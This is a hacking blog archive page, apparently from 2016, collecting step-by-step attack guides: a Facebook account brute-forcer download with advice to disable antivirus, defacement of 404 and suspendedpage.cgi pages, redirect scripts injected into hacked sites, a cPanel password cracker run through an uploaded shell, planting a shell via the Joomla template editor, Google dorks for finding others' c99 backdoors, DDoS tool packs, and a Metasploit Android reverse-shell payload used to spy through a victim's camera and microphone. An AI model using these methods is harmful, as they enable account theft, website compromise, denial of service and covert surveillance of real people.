Tampilkan postingan dengan label pentesting. Tampilkan semua postingan
Tampilkan postingan dengan label pentesting. Tampilkan semua postingan

Senin, 20 Juni 2016

Crack Facebook Accounts with VIP FB Cracker 2016

Hello Readers, I know you all are tired of asking everyone "How to hack fb account". Many of you guyz use Phishing for that but now Today Im going to share a wonderful tool for you which does not hack Facebook Account but Crack Facebook account :P lol ..Its a Fb Account Bruteforcer And also a private tool worth $20. I got many Messages from people asking me on Facebook to share this tool. So here it is Guyz..Enjoy it for Free..

NOTE:- Your Antivirus will show this a Virus Its not a virus Its a Cracking Tool that's why you Disable your Antivirus then use 
Download(DropBox):-
http://sh.st/DveCA
LINK UPDATED 2016!

Rar Password:- hackers-store.blogspot.com

About:-

  • Its a Simple Fb account Bruteforcer(Cracker) uses 1 socket
  • No requires Proxies
  • Auto Save Cracked Accounts 



How to Use :-

1). Download the VIP FB Cracker From here. And Extract it..

2). It contains the following things :-



3). Open Vip FB Cracker..



  • Load the Email list to Crack
  • Then password list
  • And finally click on Start


NOTE:- If you are getting any .OCX error Start Error_FixeR.exe which is in the .rar file Then open the Software ..

4). If you cracked a fb account you will get it Under FB Accounts Cracked:



Enjoy!!!!!
POST UPDATED! :) 2016
Read more

How to Deface 404 pages Using Shell 2016

How to Deface 404 pages Using Shell: Hello guys so today we will be talking about How to Deface 404 pages Using Shell, means if you have defaced index.html and if you open any directory which is not present in the site you will get your defaced page for example I have defaced www.site.com/index.html and if I open www.site.com/blahblah I will get my deface page!

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

What are 404 Error Pages?


ok for those who don't know about 404 pages, let me tell you.. If you get 404 Error pages then it  means that the file like you are looking for does not exists on the website! for example, I look for
www.site.com/blahblah now the file name or directory blahblah is not there on the website so it will show 404 error.

Common Names for 404 Error pages:
  • 404 error page not found
  • 404 error file not found
  • 404 invalid directory etc...
  • Not Found

How to Deface 404 pages Using Shell


Advantages of 404 pages in website hacking:

If someone try to find or access your shell by guessing like (c99.php, r57.php etc), if not found then it will show your custom 404 error page on Not found Link. In most of the cases we usually upload our deface page as index.html or anyname.html on hacked websites.and we can see our deface page on That custom link only where we uploaded our deface page 
For example : site.com/index.html, site.com/r00t.html site.com/r00t.php

by adding deface page's code in 404 page you can see your deface page on every link 
like site.com/xyz.php site.com/x.html site.com/xyz/, 

How to Deface 404 pages Using Shell

All you have to do is just copy and paste the code given below in a notepad(or you can use your deface page's code)  and save as 404.shtml and upload to public_html/ directory using shell..
now check any error link !! :) simple

Code for 404 Pages :
<style type="text/css">body { background-color: #000;}</style>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikpIAq_RRZIFZEPGhmZgMNHbpyON7v5hyRL_EXh6CSBx9QeLgOC6P2lUQQxMBGD4zuUehd7y8rKKGseyxjffbaEktYXPAObfMUw6n6FinvrUHfD_yqbXwQLGd7mF0T_YvJswCCII9U7C4/s1600/935389_169429133221158_1802310639_n.jpg" width="1198" height="765" />
(replace image link with your own image in this code)
Read more

How to Redirect a Hacked Website to your Website[SEO]

How to Redirect a Hacked Website to your Website[SEO]: Hello guys so today we will discuss about How to Redirect a Hacked Website to your Website[SEO]. This might be very helpful to you because when you are facing downtime or when you have low traffic on Website/Blog,then you can get or steal the traffic of the website's which you have hacked!All you have to do is Just to redirect the hacked website on your Main website.How to Redirect a Website to other Website

Today we will discuss about a blackhar SEO method to redirect a website(hacked by you) to your own website and to steal all the traffic of the hacked site.


How To Redirect Hacked Website to your Website[SEO]


So here we are talking about How to Redirect a Hacked Website to your own Website, How to Redirect a Website to other Website, How to Redirect a Website to your own Website

NOTE: for this you need to access to the shell uploaded on you desired website which you want to redirect to your site


To Redirect a Hacked Website to your own Website, open your deface in Notepad And paste this code just after </title>
Code :- 
</SCRIPT><script> delayRedirect('http://www.thehackerstore.net/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script> 

(replace http://www.thehackerstore.net/ with your own website)

Now save The Deface page and Upload on hacked website :) The website will be redirect on your website ! :)

How To Add A Pop Up and Open Your website in a New window

If you want to Open Your website In a New Window (Pop-up) Paste this code
<script language="javascript">
window.open('http://www.thehackerstore.net/','','width=700,height=600')
</script> after  </title> 

So, that's it guys and trust me its the best method to get traffic on your website. If you are having any queries you can ask them below in comment section :)

Web Design in Vijayawada
Read more

HOW TO SPOOF YOUR MAC ADDRESS (ANONYMITY) 2016


HOW TO SPOOF YOUR MAC ADDRESS (ANONYMITY)

SPOOFING YOUR MAC ADDRESS (ANONYMITY), how to spoof your mac address, spoofing your mac address,spoof your mac address, change your mac address.

MAC (Media Access Control) is a number that identifies your network adapter or adapters for connecting to the internet. To remain exceptionally anonymous you must change your MAC IP address. By changing your macintosh address you can:
  • Staying Anonymous 
  • Bypass Mac Filters 
  • Mac Authentication 
spoof your mac address, how to spoof your mac address, trick to spoof your mac address, how to change your mac address.

#1 Staying Anonymous :


The first and the chief thing by ridiculing your macintosh location is with the end goal of namelessness. Your macintosh location can be seen by any individual on your neighborhood (LAN) or besides in the event that you are associated with a WiFi system any individual can see your macintosh address by simply running a basic sweep either from windows or Linux. A basic sample of this is to simply utilize the order from Linux as

airodump-ng (mon0 = your wifi interface) 



The BSSID's recorded over allude's to the macintosh addresses for different systems accessible in your reach. By simply running a straightforward sweep we discover the different BSSID's accessible. Programmers may attempted to misuse your system in the event that they figured out your macintosh address and can utilize the web as being "you" That's the reason you have to change your MAC address.

#2 Bypassing MAC Filters :


If you ever need to unite with an open WiFi system with the end goal of staying unknown however things didn't turned out really well, may be the WiFi proprietor is utilizing a MAC channel. Macintosh channel implies just permitting those clients to interface which have a particular MAC address. By changing your MAC location to that particular location which is joined you can associate with a system yet first by de validating the present client.

#3 MAC Authentication : 


Some ISP (Internet Service Provide) might just permit you to interface with a MAC address in the event that you have a particular location. So changing your location dependably helps for this situation.

HOW TO CHANGE YOUR MAC ADDRESS

1. Smac ( For Windows) :- It is an effective MAC changer that has been around for a considerable length of time. It is anything but difficult to use with any equipment. You should be a "specialist" to utilize this. It totally parodies your Mac address. Rather than utilizing Smac there are numerous product's accessible which you can use to change your PC's macintosh location thus on stay unknown on the web.

You can download it by clicking Here



2. Macintosh Changer (Linux) :- Mac-changer is a free accessible apparatus which is utilized for changing the Mac address in a Linux machine. What you have to do is select your web interface and run the summon and its basically done.



The above screenshot is taken from Backtrack and it is unreservedly accessible in Backtrack and numerous other higher adaptations.

sudo well-suited get introduce macchanger-gtk 


Thanks for Reading :)
Read more

How to deface suspendedpage.cgi

How to deface suspendedpage.cgi: Today in this article we will discuss about How to deface suspendedpage.cgi. You might have landed to this suspendedpage.cgi page by mistake and ignored it but we can deface it.  Its very simple How to deface suspendedpage.cgi all you have to do is to follow the steps given below :)

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.



How to deface suspendedpage.cgi


How to deface suspendedpage.cgi. So we are discussing here about to deface suspendedpage.cgi. all you have to do is uts to convert your deface page's html coding to .cgi script and upload it in /cgi-bin/ or /cgi-sys/ directories :) . Just follow the steps :)


How to deface suspendedpage.cgi


How to deface suspendedpage.cgi. Just follow the simple steps given below How to deface suspendedpage.cgi :)
  • Go HERE and convert your deface.html to .cgi script :)
  • Save it as suspendedpage.cgi
  • And finally upload it in the /cgi-bin/ or /cgi-sys/ directories :)
  • When you have uploded it, change the chmod from suspendedpage.cgi to 755.
  • Save and see the result :D
    Example: www.site.com/cgi-sys/suspendedpage.cgi
  • BOOM!! You have DEFACED suspendedpage.cgi page :D :D

So that's it If you have any doubts feel free to ask :)

Read more

How to Crack Cpanels 2016

How to Crack Cpanels  : So today In this article we will discuss about How to Crack Cpanels Easily . I will explain you each and every steps :) ok lets have a look what what are the things we will need to crack cpanels :) How to Crack Cpanels Easily..2016

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.


Thing you need to Crack Cpanels Easily:
  • Shelled Site                                 
  • Cpanel Cracker: Download Here
  • List of Username and Password  
crack cpanel, how to crack cpanel,easiest way to crack cpanel, how to crack cpanel password, cracking cpanels password, crack cpanels from server, hack cpanels, cpanels hack, cpanels cracking

How to Crack Cpanels Easily 


How to Crack Cpanels Easily . Now lets look at the procedure. just follow the simple steps How to Crack Cpanels Easily .
  • Upload your cpanel cracker cp.php(Download Here) into your shell. 
  • Scroll down, click on User to get all the usernames of Cpanel


  • Copy the Username and Password from your dictionary and paste in the User and Pass column


  • Click start and wait them cracked. :D
  • You will get the result in the next page.

  • You can login at into the Cpanel at www.example.com:2082 :)
So thats it so simple if you have any doubts feel free to comment below :) :)
Read more

How To Upload Shell in Joomla Via Admin Panel

Hello Guys! Successfully Hacked into Joomla Admin Panel? Not sure how to upload shell in jooma via admin panel? well your are at right place because today we are talking about How To Upload Shell in Joomla Via Admin Panel. Today I'm going t teach you How To Upload Shell in Joomla Via Admin Panel. Its pretty simple! just follow the following steps given below  :) :-

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have an access to joomla admin. Now just login into it..



Once you Login you see the below screen.



Then look for Extensions and in that Template Manager.



Once you click on that you will see all the templates installed on that site.



See the marking in red it has the star. It means its the default template used by the sites currently. Select any of the template like it did beez in green.



Once you click on beez you will see the following screen. now just click on edit html



Once you click on edit html you will see the following screen



see the red part /templates/beez/index.php that is the path of your shell

Now just paste your shell code over their and save it




Once you click on save. it will take you to page were it will show you Template source saved. you work is done..

Once that is done you can access your shell. Path of the shell would be

www.site.com/templates/beez/index.php

Read more

Google Dorks: Find Already Uploaded Backdoored c99 Shells 2016

Google Dorks: Find Already Uploaded Backdoored c99 Shells. So today we will talk about How to find c99 Shells from google dorks. People always keep a backdoore in their hacked sites in-case they miss their shell or admin delete it. So here, we will provide you a huge list of google dorks thorugh which you guys can find c99 shells from google.

POST UPDATED with new latest dorks! 2016

Google Dorks: Find Already Uploaded Backdoored c99 Shells
Google Dorks: Find Already Uploaded Backdoored c99 Shells

Google Dorks: Find Already Uploaded Backdoored c99 Shells


 Google Dorks: Find Already Uploaded Backdoored c99 Shells. how to find c99 shell, get c99 shell from google, get free shells from Google, get already uploaded shells from google. download c99 from google, upload c99 shell, c99 shell, backdoor c99.php, get c99.php from google

Google Dorks: Find Already Uploaded Backdoored c99 Shells

Here is the huge list of Dorks to find c99 shells from google. :) :





safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php 


Read more

Selasa, 23 Februari 2016

Distrubuted Denial of Service Attack Mini Pack

DDoS Attack Pack

Beware of Distributed Denial of Service Attacks

DISTRIBUTED DENIAL OF SERVICE

This Acronym DDoS spells out  "Distributed Denial of Service." A DDoS assault is a pernicious endeavor to make an online administration inaccessible to clients, as a rule by incidentally hindering or suspending the administrations of its facilitating server.

(DoS) VS (DDos)

Unlike the Denial of Service (DoS) attack, where a single web-connected device (one network connection) is used to flood targeted resource with packets, a DDoS attack is executed from many unique connected devices, often distributed globally referred to as a botnet.

Two Types Of DDoS Attacks

UDP

This DDoS assault influences the User Datagram Protocol (UDP), a sessionless systems administration convention. This sort of assault surges irregular ports on a remote host with various UDP packets, bringing about the host to over and over check for the application listening at that port, and (when no application is discovered) answer with an ICMP Destination Unreachable bundle. This procedure saps host assets, and can at last prompt distance.

SYN

A SYN surge DDoS assault abuses a known shortcoming in the TCP association grouping (the "three-way handshake"), wherein a SYN solicitation to start a TCP association with a host must be replied by a SYN-ACK reaction from that host, and after that confirmed by an ACK reaction from the requester. In a SYN surge situation, the requester sends numerous SYN asks for, however either does not react to the host's SYN-ACK reaction, or sends the SYN asks for from a ridiculed IP address. In any case, the host framework keeps on sitting tight for affirmation for each of the solicitations, tying assets until no new associations can be made, and at last bringing about disavowal of administration.

The Three Divisions of DDoS are

Volume Based Attacks
Protocol Attacks
Application Layer Attacks

I have grouped up some DDoS tool found various places over the internet so you can test and if possible fix any bugs.

DDos Tools 
Link One
Link Two
Link Three
Link Four 
Link Five
Mini Ultimate Pack Depositfiles (Compressed by Ha{k3r4l!f3 )

Share and Comment for My Full Pack 
To 
Shutdown any website Https / Http
Ultimate Hack Pack 3.85 Gb Coded by Ha{k3r4l!f3

"Corupt Fear Us~ Guilty Confess to Us~ Heroes Join Us"

USE A VPN WITH THESE TOOLS






Read more

Selasa, 16 Februari 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit




You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:


Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.


Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.16 (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit


When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.



Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4



Take photos using the devices cameras


First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap


If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2


Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2


Any Issue or thing you dont understand feel free to comment below ... Thanks 




Read more